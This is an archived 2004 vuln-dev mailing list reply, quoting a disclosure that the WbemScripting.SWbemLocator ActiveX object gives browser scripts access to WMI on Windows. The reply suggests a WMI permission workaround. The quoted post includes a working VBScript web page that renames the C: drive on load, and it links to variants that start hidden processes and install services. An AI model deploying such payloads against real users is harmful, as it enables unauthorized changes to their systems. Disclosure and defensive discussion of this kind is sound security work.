Vulnerability Development mailing list archives
[SPAM] RE: WbemScripting.SWbemLocator - createobject allows... EVERYTHING!
From: "jasonk" <jasonk () bluedevel com>
Date: Fri, 5 Mar 2004 10:05:23 +1100
Hi Bartosz, If you run as an administrator, and allow unrestricted ActiveX access, this is no different to any other exploit. If the activex was a trojan and you allowed full scripted access, there is the same effect. However I imagine this can be used with some crossing the boundaries to My Computer, and then an attack effected much more easily than a "known file location" vuln. For a temporary fix, under xp: Open Computer Management, Services and Applications-> right click WMI Control, choose Properties. Then, Deny "provider write" and "execute methods" for the cimv2 namespace. This quite possibly WILL affect other applications on the computer, but should prevent this from occuring. Otherwise, I don't know enough about WMI to be able to say how to disable certain applications. Anyone help? jasonk
-----Original Message----- From: Bartosz Kwitkowski [mailto:bartosz () wb pl] Sent: Friday, 5 March 2004 8:24 AM To: vuln-dev () securityfocus com Subject: WbemScripting.SWbemLocator - createobject allows... EVERYTHING! I would like to dedicate this discovery to Justyna. WbemScripting.SWbemLocator - this object has access to WMI in Win XP ( i have Prof fully patched). , 2003 , any NT? I think, this vuln concerns all Windows where we can find WbemScripting.SWbemLocator. I would not like to publish more exploits because of their dangerous use more examples are at: http://wb.pl/bartosz/wbem/process.htm - create process in hidden window http://wb.pl/bartosz/wbem/installservice.htm - installs service http://wb.pl/bartosz/wbem/changevolume.htm - changes volume of C: HOME PAGE - http://wb.pl/bartosz/ example source: <HTML> <HEAD> <TITLE>Change volume of disk</TITLE> <SCRIPT LANGUAGE="VBScript"> // I would like to dedicate this discovery to Justyna. Sub window_onload const impersonation = 3 Set Locator = CreateObject("WbemScripting.SWbemLocator") Set Service = Locator.ConnectServer() Service.Security_.ImpersonationLevel=impersonation Set Process = Service.Get("Win32_LogicalDisk=""C:""") Process.VolumeName = "bartosz kwitkowski Process.Put_ end sub </SCRIPT> </HEAD> <BODY> I would like to dedicate this discovery to Justyna. </BODY> </HTML> ANY QUESTIONS? ASK ME!
Attachment:
smime.p7s
Description:
Current thread:
- WbemScripting.SWbemLocator - createobject allows... EVERYTHING! Bartosz Kwitkowski (Mar 04)
- [SPAM] RE: WbemScripting.SWbemLocator - createobject allows... EVERYTHING! jasonk (Mar 04)